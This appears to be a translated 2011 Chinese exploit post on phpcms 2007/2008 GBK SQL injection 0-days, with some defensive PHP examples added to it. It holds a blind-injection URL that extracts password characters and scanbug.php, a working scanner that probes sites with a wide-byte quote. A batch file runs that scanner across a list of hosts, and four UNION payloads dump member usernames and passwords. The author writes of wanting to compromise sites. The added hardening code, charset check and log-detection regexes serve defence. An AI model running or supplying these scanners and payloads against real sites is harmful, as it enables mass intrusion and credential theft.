phpcms2008 0day & phpcms 2007 GBK edition 0day injection scanning script
Source: vfocus.net  Author: vfocus  Published: 2011-07-27

Affected program: phpcms2008 gbk

Vulnerable file: ask/search_ajax.php
Code:
<?php 
require './include/common.inc.php';
require_once MOD_ROOT.'include/ask.class.php';
$ask = new ask();
header('Content-type: text/html; charset=utf-8');
// $q is never assigned in this file: it comes from the request through the included common.inc.php
if(strtolower(CHARSET) != 'utf-8') $q = iconv(CHARSET, 'utf-8', $q);
if($q)
{
    // the search term is concatenated straight into the LIKE clause
    $where = " title LIKE '%$q%' AND status = 5";
}
else 
{
    exit('null');
}
$infos = $ask->listinfo($where, 'askid DESC', '', 10);
foreach($infos as $key=>$val) 
{
    // the raw term is also echoed back inside the highlight markup
    $val['title'] = str_replace($q, '<span class="c_orange">'.$q.'</span>', $val['title']);
    $info[$key]['title'] = CHARSET != 'utf-8' ? iconv(CHARSET, 'utf-8', $val['title']) : $val['title'];
    $info[$key]['url'] = $val['url'];
}
echo(json_encode($info));
?>
Test method:
ask/search_ajax.php?q=s%E6'/**/or/**/(select ascii(substring(password,1,1))/**/from/**/phpcms_member/**/where/**/username=0x706870636D73)>52%23
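A hardened version of the handler above, added here as an example (it is not phpcms code). The search term is bound as a query parameter so it can never change the SQL, LIKE wildcards are escaped so a user-supplied % or _ matches literally, the parameter is read explicitly from $_GET instead of relying on variable import, and the highlight markup is built from HTML-escaped strings. The table phpcms_ask, its rows and the in-memory SQLite database are constructed for the demo; phpcms itself runs on MySQL, but the prepared-statement pattern is the same.

```php
<?php
// Added example, not phpcms code: prepared-statement replacement for search_ajax.php.
// Table, rows and the SQLite database are constructed for the demo.

// Escape LIKE metacharacters so a user-supplied % or _ matches literally.
function escape_like(string $s, string $esc = '\\'): string
{
    return str_replace([$esc, '%', '_'], [$esc . $esc, $esc . '%', $esc . '_'], $s);
}

// Same query as the original, but $q travels as data: it cannot alter the SQL.
function search_titles(PDO $db, string $q, int $limit = 10): array
{
    $stmt = $db->prepare(
        "SELECT askid, title, url FROM phpcms_ask
         WHERE title LIKE :pat ESCAPE '\\' AND status = 5
         ORDER BY askid DESC LIMIT :lim"
    );
    $stmt->bindValue(':pat', '%' . escape_like($q) . '%', PDO::PARAM_STR);
    $stmt->bindValue(':lim', $limit, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// The original wraps the raw term in a <span>; escape both strings first so the
// term cannot smuggle markup into the page that renders this JSON.
function highlight(string $title, string $q): string
{
    $t = htmlspecialchars($title, ENT_QUOTES, 'UTF-8');
    $k = htmlspecialchars($q, ENT_QUOTES, 'UTF-8');
    return $k === '' ? $t : str_replace($k, '<span class="c_orange">' . $k . '</span>', $t);
}

// Constructed demo data standing in for the phpcms_ask table.
function make_demo_db(): PDO
{
    $db = new PDO('sqlite::memory:');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $db->exec('CREATE TABLE phpcms_ask (askid INTEGER, title TEXT, status INTEGER, url TEXT)');
    $ins = $db->prepare('INSERT INTO phpcms_ask VALUES (?, ?, ?, ?)');
    foreach ([
        [1, 'How do I install phpcms?',      5, '/ask/1'],
        [2, 'Template shows 100% width',     5, '/ask/2'],
        [3, 'Unreviewed question on phpcms', 1, '/ask/3'], // status != 5: never listed
    ] as $row) {
        $ins->execute($row);
    }
    return $db;
}

$db = make_demo_db();

if (PHP_SAPI === 'cli') {
    // Stand-alone run: a normal term, a term with a literal %, and two
    // injection-shaped strings (plain quote, and quote behind a lone 0xCF byte).
    foreach (['phpcms', '100%', "x' or 1=1 -- ", "x\xcf' or 1=1 -- "] as $term) {
        printf("%-32s -> %d row(s)\n", rawurlencode($term), count(search_titles($db, $term)));
    }
} else {
    // Web handler: read the parameter explicitly instead of relying on extract($_GET).
    $q = isset($_GET['q']) ? (string) $_GET['q'] : '';
    if ($q === '') {
        exit('null'); // same empty-term behaviour as the original
    }
    header('Content-type: application/json; charset=utf-8');
    $out = [];
    foreach (search_titles($db, $q) as $row) {
        $out[] = ['title' => highlight($row['title'], $q), 'url' => $row['url']];
    }
    echo json_encode($out);
}
```

Run with `php` on the command line it prints the row count for each term; the injection-shaped strings are compared against titles as literal text, so they match nothing and never reach the parser as SQL. On a real GBK MySQL connection the same code works with `$db->exec("SET NAMES gbk")` replaced by PDO's charset DSN option so the server and the client agree on the encoding.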
 
==================================
 
phpcms 2007 GBK edition 0day injection scanning script
 
Author: TheLostMind
 
I was actually fairly busy and wanted to take a site, and found this 0day to be quite good, so I wrote a script that automatically scans for sites that have the vulnerability. As for automatically injecting out the account passwords, I'll leave that out, no showing off.
 
From a look around online, it seems this was discovered by "小蟑螂" (Little Cockroach) of 零客网安 0.S.T~~
 
The vulnerability is at line 4 of member/member.php; the code is as follows:
 
.............. 
$m = $db->get_one("SELECT * FROM ".TABLE_MEMBER." m , ".TABLE_MEMBER_INFO." i WHERE m.userid=i.userid AND m.username='$username' ","CACHE",86400); 
..............
 
The username variable enters the query without any filtering, and the included file include/common.inc.php contains the following code:
 
................ 
@extract($_POST, EXTR_OVERWRITE); 
@extract($_GET, EXTR_OVERWRITE); 
...............
 
Heh, let's start injecting! Since the variable sits inside single quotes ('), we need a way to get around that restriction; for the details see the 80sec article:
http://www.80sec.com/php-coder-class-security-alert.html
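The mechanism the 80sec article describes, shown with PHP's own multibyte functions as an added example (not code from the page): addslashes() turns the quote into the two bytes 5C 27, but on a GBK site a lone lead byte such as 0xCF immediately before it pairs with the 0x5C, so the database sees one wide character followed by a bare quote. The same block shows the input-boundary check that catches the probe: 0xCF followed by 0x27 is not a valid GBK sequence, so mb_check_encoding() rejects it while ordinary GBK text passes. The byte strings are constructed for the demo.

```php
<?php
// Added example, not from the page: why a lone lead byte before the quote defeats
// addslashes() on a GBK site, and a charset-validity check that rejects it.
// Only mbstring is used; the input bytes are constructed for the demo.

// What magic_quotes_gpc / addslashes() does to the incoming value.
function escaped_bytes(string $input): string
{
    return addslashes($input);   // "'" becomes "\'" , i.e. bytes 5C 27
}

// Split the escaped bytes into characters the way a GBK-aware MySQL connection
// would, returning each character as hex. A lead byte in 81..FE followed by a
// trail byte in 40..7E or 80..FE is one character, and 0x5C is in that range.
function gbk_chars(string $bytes): array
{
    $chars = [];
    $n = mb_strlen($bytes, 'GBK');
    for ($i = 0; $i < $n; $i++) {
        $chars[] = bin2hex(mb_substr($bytes, $i, 1, 'GBK'));
    }
    return $chars;
}

// Defence at the input boundary: refuse anything that is not valid in the site
// charset before it is escaped or queried. 0x27 is not a legal GBK trail byte,
// so a lone 0xCF before the quote fails the check while real GBK text passes.
function valid_in_charset(string $input, string $charset = 'GBK'): bool
{
    return mb_check_encoding($input, $charset);
}

$cases = [
    'plain quote' => "tlm'",               // normal attempt: the backslash survives as its own character
    'wide-byte'   => "tlm\xcf'",           // lone lead byte 0xCF right before the quote
    'gbk text'    => "\xb2\xe2\xca\xd4",   // "测试" in GBK: ordinary input, must stay allowed
];

foreach ($cases as $label => $in) {
    $esc = escaped_bytes($in);
    printf("%-12s valid=%-3s escaped=%-14s chars=[%s]\n",
        $label,
        valid_in_charset($in) ? 'yes' : 'no',
        bin2hex($esc),
        implode(' ', gbk_chars($esc)));
}
```

Reading the chars column for the wide-byte case shows the 0xCF and the 0x5C reported as a single character with the 0x27 standing alone after it, which is exactly what the query string in the scanner below relies on. The validity check is a useful first line, but the fix that does not depend on charset rules is to stop building SQL from strings: prepared statements, or at minimum mysqli_set_charset() followed by mysqli_real_escape_string(), which escapes with knowledge of the connection charset. Reading $_GET['username'] explicitly rather than through extract() removes the other half of the problem.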
 
I modified 鬼仔's (Guizai's) tool a bit and used it directly, showing off, haha...
 
=================scanbug.php==========================================
 
<?php
if ($argc < 3) {
    print_r('
--------------------------------------------------------------------------------
PHPcms SODB-2008-13 Exp 
Usage: php '.$argv[0].' host path
host: target server (ip/hostname),without"http://"
path: path to phpcms
Example:
php '.$argv[0].' localhost /
--------------------------------------------------------------------------------
');
    die;
}

// Send one raw HTTP request to $host on port 80 and collect the whole response in $html.
function sendpacketii($packet)
{
    global $host, $html;
    $ock = fsockopen(gethostbyname($host), '80');
    if (!$ock) {
        echo 'No response from '.$host; die;
    }
    fputs($ock, $packet);
    $html = '';
    while (!feof($ock)) {
        $html .= fgets($ock);
    }
    fclose($ock);
}

$host = $argv[1];
$path = $argv[2];
$prefix = "phpcms_";
//$cookie="PHPSESSID=2456c055c52722efa1268504d07945f2";
if (($path[0] <> '/') or ($path[strlen($path)-1] <> '/')) {
    echo "Error... check the path!\r\n\r\n"; die;
}
/* get $prefix */
$packet  = "GET ".$path."member/member.php?username=tlm%cf' HTTP/1.0\r\n";
$packet .= "Host: ".$host."\r\n";
//$packet.="Cookie: ".$cookie."\r\n";
$packet .= "Connection: Close\r\n\r\n";
sendpacketii($packet);
//echo $html;
echo "\n\n正在测试站点: $host ……\n";
// The original used eregi(), which was removed in PHP 7; stripos() is the same case-insensitive match.
if (stripos($html, "in your SQL syntax") !== false)
{
    // The verbose MySQL error echoes the failing query, so the table prefix can be read off after "FROM ".
    $temp = explode("FROM ", $html);
    $temp2 = array();
    if (isset($temp[1])) { $temp2 = explode(" ", $temp[1]); }
    if (!empty($temp2[0])) {
        $prefix = $temp2[0];
        echo "数据库为: ".$prefix."\r\n";
        echo "当前站点发现漏洞,请手工检测...\r\n";
    }
    $filename = "php0day.txt";
    $handle   = fopen($filename, "a+");
    if (!is_writable($filename)) {
        die("文件:".$filename."不可写,请检查其属性后重试!");
    }
    if (!fwrite($handle, "\n存在漏洞的站点\t$host")) {
        die("生成文件".$filename."失败!");
    } // this closing brace was missing in the original, which left the outer if() unclosed
    fwrite($handle, "\r\n");
    fwrite($handle, "当前站点数据库\t");
    fwrite($handle, $prefix);
    fwrite($handle, "\r\n");
    print_r('内容已经写入文件!');
    fclose($handle); // close the file handle
}
else
    exit("没漏洞哦……\n");

?>
 
===================================END==========================================
 
The batch file is even simpler:
 
===================================scan.bat=======================================
 
@echo off
title PHPcms PHPcms 0DAY自动注射程序工作中……
rem php.txt holds one host per line; each is passed to the scanner script with path /
FOR /F "eol=; tokens=1,2,3* delims=, " %%i in (php.txt) do D:\PHPnow-1.4.5-20\php-5.2.6-Win32\php.exe 0dayhpcms.php %%i /
pause
 
====================================end==========================================
 
It seems there are a lot of sites with this vulnerability; a quick scan gave a very high hit rate, heh~
 
As for reading out the password, just use UNION. I found a tool online and captured its traffic; it seems the number of columns differs between versions.
 
==============================================
 
/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62,63,64,65/**/from/**/phpcms_member/**/where/**/userid=1

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,username,password,57,58,59,60,61,62/**/from/**/phpcms_member/**/where/**/userid=1/*

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,username,password,52,53,54,55,56,57/**/from/**/phpcms_member/**/where/**/userid=1/*

/member/member.php?username=luoye%cf'union/**/select/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,username,password,53,54,55,56,57,58/**/from/**/phpcms_member/**/where/**/userid=1/*
 
=======================================
 
Just replace the database name in there; the database name has already been scanned out, and there are tools for exploiting it, the rest is up to you...
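From the defender's side, the request shapes in this write-up are easy to pick out of a web server access log. The following is an added example (not from the page) that runs three indicators over constructed combined-log lines: a lone high byte immediately before a quote (the wide-byte quote), /**/ used in place of whitespace, and UNION or SELECT in the query string. The IP addresses, timestamps and request lines are all constructed for the demo; the second line uses ordinary GBK-encoded Chinese to show that normal non-ASCII input is not flagged.

```php
<?php
// Added example, not from the page: access-log check for the request shapes
// described above. Sample lines are constructed (203.0.113.0/24 is a documentation range).

// A URL-encoded byte 80..FF followed directly by a quote, raw or encoded.
const WIDE_BYTE_QUOTE = "/%[89a-f][0-9a-f](?:'|%27)/i";
// Empty block comment used as whitespace between keywords.
const COMMENT_GLUE    = '#/\*\*/#';
// UNION or SELECT as whole words anywhere in the request target.
const UNION_SELECT    = '/\b(?:union|select)\b/i';

// Pull the request target out of a combined-log line; null if it is not a request line.
function request_path(string $line): ?string
{
    return preg_match('#"(?:GET|POST) (\S+) HTTP/[\d.]+"#', $line, $m) ? $m[1] : null;
}

// Return the list of indicators matched in one request target.
function classify(string $path): array
{
    $hits = [];
    if (preg_match(WIDE_BYTE_QUOTE, $path)) { $hits[] = 'wide-byte quote'; }
    if (preg_match(COMMENT_GLUE, $path))    { $hits[] = 'comment glue'; }
    if (preg_match(UNION_SELECT, $path))    { $hits[] = 'union/select'; }
    return $hits;
}

// Return only the lines that matched at least one indicator, with their indicators.
function flag_lines(array $lines): array
{
    $out = [];
    foreach ($lines as $line) {
        $path = request_path($line);
        if ($path === null) { continue; }
        $hits = classify($path);
        if ($hits !== []) { $out[] = ['path' => $path, 'hits' => $hits]; }
    }
    return $out;
}

// Constructed sample log lines: a normal lookup, a GBK search term ("测试"),
// the scanner's probe, and a union query of the shape listed above.
$sample = [
    '203.0.113.5 - - [27/Jul/2011:10:00:01 +0800] "GET /member/member.php?username=alice HTTP/1.0" 200 512',
    '203.0.113.5 - - [27/Jul/2011:10:00:02 +0800] "GET /ask/search_ajax.php?q=%b2%e2%ca%d4 HTTP/1.0" 200 88',
    '203.0.113.9 - - [27/Jul/2011:10:00:03 +0800] "GET /member/member.php?username=tlm%cf\' HTTP/1.0" 200 1204',
    '203.0.113.9 - - [27/Jul/2011:10:00:04 +0800] "GET /member/member.php?username=x%cf\'union/**/select/**/1,2/**/from/**/phpcms_member HTTP/1.0" 200 1408',
];

foreach (flag_lines($sample) as $hit) {
    echo implode(', ', $hit['hits']), '  <-  ', $hit['path'], "\n";
}
```

The probe line matches only the wide-byte indicator, which is enough on its own to be worth an alert, and the union line matches all three. One more point the scanner above makes clear: it decides a site is vulnerable by finding "in your SQL syntax" in the response and reads the table prefix from the echoed query, so serving generic error pages (display_errors off, errors to the log only) removes that confirmation and the prefix leak, although the injection itself is only closed by fixing the query code.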

 